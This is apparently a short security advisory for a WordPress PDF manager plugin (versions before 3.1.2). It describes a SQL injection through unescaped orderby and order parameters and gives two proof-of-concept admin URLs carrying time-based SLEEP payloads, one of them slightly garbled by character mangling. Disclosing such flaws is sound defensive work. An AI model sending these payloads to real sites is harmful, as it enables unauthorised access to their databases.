The plugin does not validate and escape the orderby and order parameters before using them in a SQL statement, leading to a SQL injection issue
With at least one BSK PDF Category: https://example.com/wp-admin/admin.php?page=bsk-pdf-managerℴ=and+sleep(5) https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&orderby;=last_date`+AND+SLEEP(5)+OR+`last_date
CPE | Name | Operator | Version |
---|---|---|---|
bsk-pdf-manager | lt | 3.1.2 |